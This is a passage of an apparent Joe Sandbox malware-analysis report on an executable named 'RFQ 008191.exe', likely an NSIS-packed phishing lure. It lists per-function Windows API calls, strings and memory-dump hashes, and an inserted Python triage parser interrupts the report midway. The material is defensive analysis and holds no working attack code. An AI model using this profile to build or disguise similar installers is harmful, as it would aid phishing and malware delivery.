                                                                    • "C:\Users\user\Desktop\RFQ 008191.exe", xrefs: 00406833
                                                                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004067F0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: Char$Next$Prev
                                                                    • String ID: "C:\Users\user\Desktop\RFQ 008191.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                                                    • API String ID: 589700163-3686559080
                                                                    • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                    • Instruction ID: 55fd55a6259970f18c414665dfb8d2eb8684f68ced2253b2c35ece4a8e009edc
                                                                    • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                    • Instruction Fuzzy Hash: 0E11E61780221295DB303B15CC40ABB62E8EF54750F16C43FE999732C0E77C4C9286BD
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00404544
                                                                    • GetSysColor.USER32(00000000), ref: 00404582
                                                                    • SetTextColor.GDI32(?,00000000), ref: 0040458E
                                                                    • SetBkMode.GDI32(?,?), ref: 0040459A
                                                                    • GetSysColor.USER32(?), ref: 004045AD
                                                                    • SetBkColor.GDI32(?,?), ref: 004045BD
                                                                    • DeleteObject.GDI32(?), ref: 004045D7
                                                                    • CreateBrushIndirect.GDI32(?), ref: 004045E1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                    • String ID:
                                                                    • API String ID: 2320649405-0
                                                                    • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                    • Instruction ID: d41769c693a3b03867a7fa47e0dc02698e8003aaa16d7874add0ef0652afaaee
                                                                    • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                    • Instruction Fuzzy Hash: 5A2195B1500704BFCB349F39DD08A477BF8AF41714B00892EEA96A22E0DB38DA44CB54
                                                                    APIs
                                                                    • ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                                                      • Part of subcall function 00406112: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406128
                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                    • String ID: 9
                                                                    • API String ID: 163830602-2366072709
                                                                    • Opcode ID: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
                                                                    • Instruction ID: 7b917313dc97d271e667d5624dbaf811d8953be2b726cd25112f37da0e7500b1
                                                                    • Opcode Fuzzy Hash: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
                                                                    • Instruction Fuzzy Hash: 35511E75D04119AADF20EFD4CA84AAEB779FF44304F14817BE501B62D0D7B89D828B58
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E96
                                                                    • GetMessagePos.USER32 ref: 00404E9E
                                                                    • ScreenToClient.USER32(?,?), ref: 00404EB8
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ECA
                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EF0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Send$ClientScreen
                                                                    • String ID: f
                                                                    • API String ID: 41195575-1993550816
                                                                    • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                    • Instruction ID: 6d9709cdd774db07ceaeaaa3ef1e8ea5a4c7015a7cc254b2929396571b15d8ef
                                                                    • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                    • Instruction Fuzzy Hash: 7E015E71900218BADB00DB94DD85BFEBBBCAF95B11F10412BBB51B61D0C7B49A418BA4
                                                                    APIs
                                                                    • GetDC.USER32(?), ref: 00401E76
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                                                    • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401EF8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                    • String ID: Calibri
                                                                    • API String ID: 3808545654-1409258342
                                                                    • Opcode ID: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                                                    • Instruction ID: 1d77b42acd886a27ae9f5cf53f8bcf428a8cf24ec4295262a5ba191a384267e2
                                                                    • Opcode Fuzzy Hash: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                                                    • Instruction Fuzzy Hash: 9E01B171950250EFEB005BB4AE8AADD3FB0AF59300F10497AF142BA1E2CAB804049B2C
                                                                    APIs
                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                                                    • MulDiv.KERNEL32(000C243A,00000064,000C243E), ref: 00403001
                                                                    • wsprintfW.USER32 ref: 00403011
                                                                    • SetWindowTextW.USER32(?,?), ref: 00403021
                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033
                                                                    Strings
                                                                    • verifying installer: %d%%, xrefs: 0040300B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                    • String ID: verifying installer: %d%%
                                                                    • API String ID: 1451636040-82062127
                                                                    • Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                    • Instruction ID: 92b1fa929db6ad6423e495ae3c8b7d5051599f53ef0535b5d141126ce54988b0
                                                                    • Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                    • Instruction Fuzzy Hash: 41014F70640208BBEF209F60DD49FEE3B69BB04345F008039FA02A51D0DBB99A559F58
                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                                    • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402A3E
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                    • String ID:
                                                                    • API String ID: 2667972263-0
                                                                    • Opcode ID: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                                    • Instruction ID: 30dd54c89a4cddf194586c2a2fc5346a944fd6f702074eaf72055d986495362b
                                                                    • Opcode Fuzzy Hash: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                                    • Instruction Fuzzy Hash: 0C31B171D00128BBCF21AFA5DE49D9E7E79AF44324F20423AF415762E1CB798D418FA8
                                                                    APIs
                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: CloseEnum$DeleteValue
                                                                    • String ID:
                                                                    • API String ID: 1354259210-0
                                                                    • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                    • Instruction ID: d442e96e729bea3163a88d870f4d25619929b9fa7009ff0cba57fd90435ded5e
                                                                    • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                    • Instruction Fuzzy Hash: 8B212A7150010ABFDF129F94CE89EEF7A7DEB54388F110076B909B21A0D7B58E54AA68
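The function entries in this section all share one machine-generated layout: an "APIs" header, one bullet per call with the API name, module, observed arguments and the "ref:" call-site address (subcall lines carry the callee address in front), an optional "Strings" block with "xrefs:", and a "Similarity" block whose "API ID" summarises the call set. The Python below is an added example, not code from the Joe Sandbox report or from the analysed sample: it parses that layout from an excerpt constructed out of the entries on this page and applies a small triage rule set. The rule set, the "verifying installer" string heuristic and the SAMPLE excerpt are this example's own assumptions.

```python
"""Parse Joe Sandbox per-function 'APIs' entries and triage them.

Added example, not code from the Joe Sandbox report or the analysed sample.
SAMPLE is constructed from entries on this page; the triage rules and the
NSIS-string heuristic are this example's own, not Joe Sandbox signatures.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed excerpt: three function entries copied from the report.
SAMPLE = """\
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
• MulDiv.KERNEL32(000C243A,00000064,000C243E), ref: 00403001
• wsprintfW.USER32 ref: 00403011
• SetWindowTextW.USER32(?,?), ref: 00403021
• SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033
Strings
• verifying installer: %d%%, xrefs: 0040300B
Similarity
• API ID: Text$ItemTimerWindowwsprintf
APIs
• RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
APIs
• ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
  • Part of subcall function 00406112: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406128
• SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
"""

HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# Args and the trailing comma are absent for some calls ('wsprintfW.USER32 ref: ...');
# 'Part of subcall function' lines carry the callee address in front of the API name.
API_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<addr>[0-9A-Fa-f]{8})"
)
STR_RE = re.compile(r"•\s*(?P<s>.*?),\s*xrefs:\s*(?P<addr>[0-9A-Fa-f]{8})")
APIID_RE = re.compile(r"•\s*API ID:\s*(?P<id>\S+)")

@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    addr: int                         # call-site address from 'ref:'
    subcall_of: Optional[int] = None  # callee address for subcall lines, else None

@dataclass
class FunctionEntry:
    calls: list[ApiCall] = field(default_factory=list)
    strings: list[tuple[str, int]] = field(default_factory=list)
    api_id: str = ""

def parse_report(text: str) -> list[FunctionEntry]:
    """Split report text into one FunctionEntry per 'APIs' header."""
    entries: list[FunctionEntry] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADERS:
            section = line
            if line == "APIs":
                entries.append(FunctionEntry())
            continue
        if not entries:
            continue
        cur = entries[-1]
        if section == "APIs" and (m := API_RE.search(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            sub = int(m["sub"], 16) if m["sub"] else None
            cur.calls.append(ApiCall(m["api"], m["mod"], args, int(m["addr"], 16), sub))
        elif section == "Strings" and (m := STR_RE.search(line)):
            cur.strings.append((m["s"], int(m["addr"], 16)))
        elif section == "Similarity" and (m := APIID_RE.search(line)):
            cur.api_id = m["id"]
    return entries

def direct_apis(entry: FunctionEntry) -> list[str]:
    """API names the function calls itself (subcall lines excluded)."""
    return [c.api for c in entry.calls if c.subcall_of is None]

# Example rules: an entry is flagged when every API in the set is called directly.
TRIAGE_RULES = {
    "registry key removal": {"RegEnumKeyW", "RegDeleteKeyW"},
    "file deletion": {"DeleteFileW"},
}

def triage(entry: FunctionEntry) -> list[str]:
    """Triage labels for the entry: API-set rules plus one string heuristic."""
    present = set(direct_apis(entry))
    labels = [name for name, apis in TRIAGE_RULES.items() if apis <= present]
    # Progress text NSIS installer stubs show during their CRC self-check; treated
    # here as a marker of installer-stub code rather than payload (heuristic).
    if any(s.startswith("verifying installer") for s, _ in entry.strings):
        labels.append("NSIS installer self-check UI")
    return labels
```

Running `parse_report` over a whole report section and printing `direct_apis` and `triage` for each entry gives a one-line-per-function view that separates installer-stub housekeeping (progress UI, recursive registry key removal, temp-file cleanup) from functions worth opening in the disassembler; the subcall lines are kept on the entry but excluded from the rule match so a helper's calls are not attributed to every caller.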
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                                    • GetClientRect.USER32(?,?), ref: 00401E0A
                                                                    • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                                                    • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                                    • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                    • String ID:
                                                                    • API String ID: 1849352358-0
                                                                    • Opcode ID: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
                                                                    • Instruction ID: eb17948d85696e98a42b5b2e026cdebc0bad80675354e43e8e08d2e827efe14e
                                                                    • Opcode Fuzzy Hash: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
                                                                    • Instruction Fuzzy Hash: 94213B72D00119AFCB05DF98DE45AEEBBB5EB08300F14003AF945F62A0D7349D81DB98
                                                                    APIs
                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
